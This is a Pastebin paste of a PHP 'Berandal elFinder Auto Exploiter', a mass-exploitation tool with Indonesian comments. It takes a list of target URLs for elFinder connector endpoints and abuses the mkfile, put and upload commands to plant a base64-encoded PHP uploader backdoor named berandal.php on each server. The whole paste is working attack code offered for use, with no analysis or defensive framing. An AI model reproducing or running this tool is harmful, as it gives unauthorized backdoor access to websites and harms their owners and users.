daily pastebin goal
25%
SHARE
TWEET

Mass Exploiter Elfinder

Berandal666 Mar 9th, 2017 250 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <title>Berandal</title>
  3. <style type="text/css">
  4. html {
  5.     text-align: center;
  6. }
  7. a {
  8.     text-decoration: none;
  9.     color: black;
  10. }
  11. </style>
  12. Nitip nick cok!<br>
  13. <h1>Berandal elFinder Auto Exploiter</h1>
  14. <form method="post">
  15. Target: <br>
  16. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:none;"></textarea><br>
  17. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="SIKAT!">
  18. </form>
  19. </html>
  20. <?php
  21. # Berandal
  22. function ngirim($url, $isi) {
  23. $ch = curl_init ("$url");
  24.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  25.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  26.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  27.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  28.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  29.       curl_setopt ($ch, CURLOPT_POST, 1);
  30.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  31.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  32.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  33. $data3 = curl_exec ($ch);
  34. return $data3;
  35. }
  36. $target = explode("\r\n", $_POST['target']);
  37. if($_POST['x']) {
  38.     foreach($target as $korban) {
  39.         $nama_doang = "berandal.php";
  40.         $isi_nama_doang =
  41. "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
  42. lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV
  43. 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  44.         $decode_isi = base64_decode($isi_nama_doang);
  45.         $encode = base64_encode($nama_doang);
  46.         $fp = fopen($nama_doang,"w");
  47.         fputs($fp, $decode_isi);
  48.         echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
  49.  
  50.         echo "# Upload[1] ......<br>";
  51.  
  52.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  53.         $b = file_get_contents("$url_mkfile");
  54.         $post1 = array(
  55.                 "cmd" => "put",
  56.                 "target" => "l1_$encode",
  57.                 "content" => "$decode_isi",
  58.                 );
  59.         $post2 = array(
  60.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  61.                 "upload[]" => "@$nama_doang",);
  62.         $output_mkfile = ngirim("$korban", $post1);
  63.         if(preg_match("/$nama_doang/", $output_mkfile)) {
  64.             echo "# Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  65.         } else {
  66.             echo "# Upload Gagal Cok! 1 <br># Uploading 2..<br>";
  67.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  68.             if(preg_match("/$nama_doang/", $upload_ah)) {
  69.                 echo "# Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  70.             } else {
  71.                 echo "# Upload Gagal Lagi Cok! 2<br><br>";}}}}
  72. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top